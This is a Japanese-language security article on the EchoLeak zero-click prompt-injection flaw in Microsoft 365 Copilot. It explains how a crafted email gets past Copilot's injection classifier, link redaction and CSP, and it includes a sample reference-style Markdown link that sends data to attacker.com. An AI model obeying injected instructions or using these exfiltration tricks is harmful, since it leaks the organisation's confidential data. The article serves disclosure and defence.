2025年6月、セキュリティリサーチ企業Aim Labsが、Microsoft 365 Copilot(以下、Copilot)に関する重大なAI脆弱性を公表しました。その名も「EchoLeak(エコーリーク)」。
この脆弱性の本質は、メールを“送るだけ”で、ユーザーの操作なしに機密情報が外部に漏洩するという点にあります。
CopilotのようなAIアシスタントが業務に根付きつつある中で、今回の報告は「AIによる情報処理の便利さの裏に、どんなリスクが潜んでいるのか」をあらためて問いかける内容です。
なお、Microsoftはこの問題に対し、CVE-2025-32711として「重大(Critical)」に分類。2025年5月にサーバー側で修正済みであり、ユーザー側での対応は不要とされています。幸いにも、現時点では悪用された形跡は確認されていません。
目次
EchoLeakの概要:メール1通でCopilotの文脈情報を外部へ
今回の攻撃チェーンでは、攻撃者が特別なコードや添付ファイルを使うことなく、単なるテキストメール1通をユーザーに送信するだけで、Copilotがその内容を処理し、内部文脈(社内ファイルやチャット履歴など)から機密情報を抽出して、攻撃者の用意したURLに含めて外部に送信してしまう、という挙動が確認されました。
◆以下簡単な流れ◆
-
攻撃者は、一見普通のビジネスメールをユーザーに送信します。本文にはCopilotやAIへの命令とは分からない形で、巧妙に命令文(プロンプト)が埋め込まれています。
-
Copilotの「RAG(Retrieval-Augmented Generation)エンジン」がこのメールを“業務に関連する情報”として読み取り、AIの応答に組み込みます。
-
結果として、Copilotが社内のメール、OneDrive、SharePoint、Teamsなどから情報を取得し、その内容を攻撃者が指定したURL付きリンクや画像の中に挿入して送信してしまう、という構図です。
これは「ゼロクリック攻撃」と呼ばれる攻撃の一種で、ユーザーが何もしなくても成立する点が極めて危険です。
攻撃の具体的な流れ
XPIA(クロスプロンプト注入防御)をバイパス
MicrosoftはCopilotに対して「これはAIへの命令ではないか?」と判定する仕組みを導入していますが、攻撃メールはあくまで“ユーザーへの指示文”として記述されるため、検知されません。
外部リンクの赤文字化・無効化を回避
Copilotは通常、外部リンクをチャット上に表示させません。が、Markdownの“参照形式”リンクを使うことで、この制限を回避できることが分かりました。
[こちらをご確認ください][ref]
[ref]: https://attacker.com?data=<機密情報>
画像リンクの自動読み込みによる“クリックなし”送信
さらに、画像を装うことでブラウザが自動で攻撃者のサーバーにアクセスする仕組みも実現されていました。
画像として読み込まれれば、ユーザーの操作は一切不要になります。
MicrosoftはCopilotの環境で外部通信を制限するためにCSPを導入していますが、TeamsやSharePointなどMicrosoft内のドメインを経由することで通信が成立してしまう抜け道も存在していました。
つまり、社内の正規サービスを経由してデータを抜き出すという、非常に高度な攻撃手法が実現可能でした。
どんな被害が想定されるか
この脆弱性が悪用されると、以下のような情報が、メール1通で抜き取られる可能性があります:
-
役員の会議資料(OneDrive)
-
機密のチャット内容(Teams)
-
社内規程・契約情報(SharePoint)
-
従業員情報(メールスレッド)
しかもこれが、ユーザーの操作なしに起きるという点が最も深刻です。
なぜ起きるのか? Copilotが抱える設計上のリスク
Copilotは、ユーザーのメールボックス、OneDrive、SharePoint、Teamsなどの情報をもとに、文脈に即した回答を生成します。
これは「RAG(Retrieval-Augmented Generation)」と呼ばれる手法で、ユーザーの手元のデータを元にAIが応答内容を強化する仕組みです。
つまり、Copilotは「社内のデータを丸ごと使えるアシスタント」ですが、その性質ゆえに、悪意ある外部からのメールに“反応してしまう”リスクがあるのです。
Aim Labsはこの攻撃の性質を「LLM Scope Violation(大規模言語モデルのスコープ違反)」と名付けました。
なぜ検知が難しいのか?
CopilotのようなAIは、構造化されていない自由な文章を処理します。そのため、「これは悪意ある文章だ」と判断することが極めて難しいのです。
加えて、外部メールを通じて内部情報を引き出すという構図は、通常の権限管理や通信制御では見落とされがちです。
今回の「EchoLeak」は、AIアシスタントが本来持つ“知能”を、攻撃者に利用されてしまうという、非常に新しいタイプのリスクを示しています。
今後、同様のゼロクリック型の攻撃は、Microsoft製品以外のAIにも波及する可能性があります。
参照







